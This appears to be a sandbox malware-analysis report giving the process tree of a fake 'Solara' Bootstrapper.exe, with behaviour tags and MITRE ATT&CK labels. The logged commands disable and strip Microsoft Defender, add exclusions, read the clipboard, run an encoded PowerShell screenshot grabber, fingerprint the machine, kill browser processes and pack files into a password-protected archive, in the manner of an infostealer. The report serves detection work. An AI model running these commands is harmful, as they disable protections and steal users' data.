C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:12⤵PID:4172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5668 /prefetch:82⤵PID:1752
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:12⤵PID:5508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6424 /prefetch:82⤵PID:5240
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6504 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5352 -
C:\Users\Admin\Downloads\Bootstrapper.exe"C:\Users\Admin\Downloads\Bootstrapper.exe"2⤵
- Executes dropped EXE
PID:1856 -
C:\Users\Admin\Downloads\Bootstrapper.exe"C:\Users\Admin\Downloads\Bootstrapper.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Bootstrapper.exe'"4⤵PID:5800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Bootstrapper.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:3536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Thanks for using solara! Redirecting you to solara.', 0, 'Solara', 48+16);close()""4⤵PID:5832
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Thanks for using solara! Redirecting you to solara.', 0, 'Solara', 48+16);close()"5⤵PID:5712
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4300
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:4868
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4372 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵PID:5676
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵PID:60
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:1568
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:3988
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3820 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:2064
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2308 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵PID:4996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6068 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5652
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:3972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5884
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5384 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:6096
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:4324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:4288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:5456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3628
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5248 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2936
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:3704
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5700 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:5684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
PID:220 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\riewjwqd\riewjwqd.cmdline"6⤵PID:852
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7601.tmp" "c:\Users\Admin\AppData\Local\Temp\riewjwqd\CSC9914BB635D4B4213932066FD2D966292.TMP"7⤵PID:2308
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5932
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:228
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3420
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:740
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5780
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5896
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3044"4⤵PID:1220
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30445⤵
- Kills process with taskkill
PID:3968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3276"4⤵PID:2464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3420
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 32765⤵
- Kills process with taskkill
PID:5840 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4968"4⤵PID:5780
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 49685⤵
- Kills process with taskkill
PID:6112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"4⤵PID:5724
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16845⤵
- Kills process with taskkill
PID:5896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4720"4⤵PID:4828
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47205⤵
- Kills process with taskkill
PID:3160 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1000"4⤵PID:5504
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3972
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10005⤵
- Kills process with taskkill
PID:1844 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6128"4⤵PID:6088
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 61285⤵
- Kills process with taskkill
PID:4872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4708"4⤵PID:5676
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47085⤵
- Kills process with taskkill
PID:6104 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4172"4⤵PID:3216
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41725⤵
- Kills process with taskkill
PID:2456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"4⤵PID:4372
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17525⤵
- Kills process with taskkill
PID:2064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5508"4⤵PID:5920
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 55085⤵
- Kills process with taskkill
PID:1912 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5448
-
C:\Windows\system32\getmac.exegetmac5⤵PID:4400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\OujDI.zip" *"4⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\OujDI.zip" *5⤵
- Executes dropped EXE
PID:5592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:5488
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:5856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:5044
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:1828
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1804
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5644
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:216
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:4468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5376 -
C:\Users\Admin\Downloads\Bootstrapper.exe"C:\Users\Admin\Downloads\Bootstrapper.exe"2⤵
- Executes dropped EXE
PID:5152 -
C:\Users\Admin\Downloads\Bootstrapper.exe"C:\Users\Admin\Downloads\Bootstrapper.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5652
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5044
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2500
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD50446fcdd21b016db1f468971fb82a488
SHA1726b91562bb75f80981f381e3c69d7d832c87c9d
SHA25662c5dc18b25e758f3508582a7c58bb46b734a774d97fc0e8a20614235caa8222
